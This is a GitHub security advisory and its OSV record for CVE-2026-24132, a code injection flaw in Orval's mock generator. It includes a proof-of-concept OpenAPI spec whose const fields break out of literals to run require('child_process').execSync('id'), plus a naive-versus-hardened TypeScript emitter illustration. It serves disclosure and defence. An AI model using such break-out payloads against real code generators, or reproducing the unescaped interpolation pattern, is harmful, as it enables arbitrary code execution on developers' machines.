GHSA-F456-RF33-4626

Vulnerability from github – Published: 2026-01-22 18:09 – Updated: 2026-01-23 15:49
Summary
Orval Mock Generation Code Injection via const
Details

I am reporting a code injection vulnerability in Orval's mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum/x-enumDescriptions injection (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path: the faker-based mock generator in @orval/mock rather than @orval/core.

The vulnerability allows an untrusted OpenAPI specification to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without escaping or type-safe serialization, so attacker-controlled code is emitted into both the interface definitions and the faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require('child_process').execSync('id') in the output TypeScript. The following specification reproduces the issue:

```yaml
openapi: 3.1.0
info:
  title: Mock Const Injection PoC
  version: 1.0.0
paths:
  /test:
    get:
      operationId: getTests
      responses:
        '200':
          description: OK
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Tests'
components:
  schemas:
    Tests:
      type: object
      properties:
        EvilString:
          type: string
          const: "'); require('child_process').execSync('id'); //"
        EvilNumber:
          type: number
          const: "0); require('child_process').execSync('id'); //"
        SafeEnum:
          type: string
          enum: ["test"]
```
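As an added illustration, not Orval's own code, the following simplified TypeScript emitter contrasts the raw interpolation pattern the advisory describes with a hardened version that type-checks each const against its declared schema type and serialises it with JSON.stringify, so the value can only ever become a single literal. ScalarSchema, the faker helper names and the function names are assumptions made for this example.

```typescript
// Added example, not Orval's own code: a deliberately simplified mock-scalar
// emitter in the spirit of the getMockScalar path the advisory describes.
// emitMockNaive shows the interpolation defect; emitMockSafe shows the fix.
// ScalarSchema and the faker helper names are assumptions for this example.

export type ScalarSchema = {
  type: "string" | "number" | "boolean";
  const?: unknown;
};

// Naive emitter: pastes the const value straight into generated source, so a
// value containing a quote or a ')' terminates the literal and continues as code.
export function emitMockNaive(name: string, schema: ScalarSchema): string {
  if (schema.const !== undefined) {
    const literal =
      schema.type === "string" ? `'${schema.const}'` : `${schema.const}`;
    return `${name}: ${literal}`;
  }
  return `${name}: faker.${schema.type}()`; // hypothetical faker helper
}

// Hardened emitter: reject a const whose runtime type does not match the
// declared schema type, then serialise both the property name and the value
// with JSON.stringify, which always yields one well-formed JS literal.
export function emitMockSafe(name: string, schema: ScalarSchema): string {
  const key = JSON.stringify(name);
  if (schema.const !== undefined) {
    const c = schema.const;
    if (typeof c !== schema.type || (typeof c === "number" && !Number.isFinite(c))) {
      throw new TypeError(`const for ${name} is not a valid ${schema.type}`);
    }
    return `${key}: ${JSON.stringify(c)}`;
  }
  return `${key}: faker.${schema.type}()`;
}

// Render every property of an object schema as lines of a mock object literal.
export function renderMock(
  props: Record<string, ScalarSchema>,
  emit: (name: string, s: ScalarSchema) => string,
): string {
  return Object.entries(props).map(([n, s]) => "  " + emit(n, s) + ",").join("\n");
}

// Constructed input: the two const properties from the advisory's PoC spec.
export const POC_PROPS: Record<string, ScalarSchema> = {
  EvilString: { type: "string", const: "'); require('child_process').execSync('id'); //" },
  EvilNumber: { type: "number", const: "0); require('child_process').execSync('id'); //" },
};
```

With the hardened emitter, the string const becomes an inert double-quoted literal and the mistyped number const is rejected before any code is generated.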


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@orval/mock"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@orval/mock"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0-rc.0"
            },
            {
              "fixed": "8.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24132"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-22T18:09:13Z",
    "nvd_published_at": "2026-01-23T00:15:52Z",
    "severity": "HIGH"
  },
  "details": "I am reporting a code injection vulnerability in Orval\u2019s mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum x-enumDescriptions (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core.\n\nThe vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require(\u0027child_process\u0027).execSync(\u0027id\u0027) in the output TypeScript.\n\n```yaml\nopenapi: 3.1.0\ninfo:\n  title: Mock Const Injection PoC\n  version: 1.0.0\npaths:\n  /test:\n    get:\n      operationId: getTests\n      responses:\n        \u0027200\u0027:\n          description: OK\n          content:\n            application/json:\n              schema:\n                $ref: \u0027#/components/schemas/Tests\u0027\ncomponents:\n  schemas:\n    Tests:\n      type: object\n      properties:\n        EvilString:\n          type: string\n          const: \"\u0027); require(\u0027child_process\u0027).execSync(\u0027id\u0027); //\"\n        EvilNumber:\n          type: number\n          const: \"0); require(\u0027child_process\u0027).execSync(\u0027id\u0027); //\"\n        SafeEnum:\n          type: string\n          enum: [\"test\"]\n\n```",
  "id": "GHSA-f456-rf33-4626",
  "modified": "2026-01-23T15:49:31Z",
  "published": "2026-01-22T18:09:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/security/advisories/GHSA-f456-rf33-4626"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24132"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/pull/2828"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/pull/2829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/pull/2830"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/44ca8c1f5f930a3e4cefb6b79b38bcde7f8532a5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/6d8ece07ccb80693ad43edabccb3957aceadcd06"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/9b211cddc9f009f8a671e4ac5c6cb72cd8646b62"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/orval-labs/orval"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/releases/tag/v7.20.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/releases/tag/v8.0.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Orval Mock Generation Code Injection via const"
}

